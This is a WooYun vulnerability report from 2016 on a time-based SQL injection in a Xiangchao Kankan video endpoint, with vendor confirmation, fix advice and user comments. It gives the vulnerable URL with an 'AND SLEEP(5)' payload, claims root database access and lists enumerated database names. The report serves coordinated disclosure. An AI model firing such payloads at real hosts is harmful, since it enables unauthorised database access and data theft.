当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0186853

漏洞标题:响巢看看某处SQL注入

相关厂商:响巢看看信息技术有限公司

漏洞作者: 珈蓝夜宇

提交时间:2016-03-20 09:30

修复时间:2016-05-05 10:51

公开时间:2016-05-05 10:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-20: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-05-05: 细节向公众公开

简要描述:

迅雷看看现在变成响巢看看了...

详细说明:

http://videoproperty.xmp.kankan.com:8001/getinfo.lua?cid=4FB05962EE9E7B5F07ED3403AC1ABC22A0839892&filesize=14844951 AND SLEEP(5)
等5秒

迅雷3.png

漏洞证明:

证明注入点:

迅雷1.png


迅雷2.png


root权限

迅雷4.png


available databases [6]:
[*] gcidcid_map
[*] information_schema
[*] mysql
[*] test
[*] videoproperty
[*] videoproperty_20151116

修复方案:

使用参数检查的方式,拦截带有SQL语法的参数传入应用程序
使用预编译的处理方式处理拼接了用户参数的SQL语句
在参数即将进入数据库执行之前,对SQL语句的语义进行完整性检查,确认语义没有发生变化
在出现SQL注入漏洞时,要在出现问题的参数拼接进SQL语句前进行过滤或者校验,不要依赖程序最开始处防护代码
定期审计数据库执行日志,查看是否存在应用程序正常逻辑之外的SQL语句执行

版权声明:转载请注明来源 珈蓝夜宇@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-03-21 10:51

厂商回复:

非常感谢,我们尽快修复!

最新状态:

暂无

漏洞评价:

评价

  1. 2016-04-06 21:34 | 从容 ( 普通白帽子 | Rank:389 漏洞数:96 | Enjoy Hacking Just Because It's Fun | ...)

    爱你。

  2. 2016-04-07 09:35 | 珈蓝夜宇 ( 普通白帽子 | Rank:242 漏洞数:34 | 人不彻底绝望一次,就不会懂得什么是自己最...)

    @从容 啊?爱我?

  3. 2016-04-07 09:46 | 从容 ( 普通白帽子 | Rank:389 漏洞数:96 | Enjoy Hacking Just Because It's Fun | ...)

    @珈蓝夜宇 嗯 爱你

  4. 2016-04-07 10:15 | 珈蓝夜宇 ( 普通白帽子 | Rank:242 漏洞数:34 | 人不彻底绝望一次,就不会懂得什么是自己最...)

    @从容 啊,大表哥,你这样让我受宠若惊啊.你是响巢看看的呀?

  5. 2016-04-07 15:46 | 从容 ( 普通白帽子 | Rank:389 漏洞数:96 | Enjoy Hacking Just Because It's Fun | ...)

    @珈蓝夜宇 不是啊,就是对你好奇

  6. 2016-04-07 16:10 | 珈蓝夜宇 ( 普通白帽子 | Rank:242 漏洞数:34 | 人不彻底绝望一次,就不会懂得什么是自己最...)

    @从容 啊 那我们可以加个qq来吹牛的

  7. 2016-04-07 16:36 | prolog ( 普通白帽子 | Rank:743 漏洞数:147 )

    @从容 @珈蓝夜宇 你们应该加淡蓝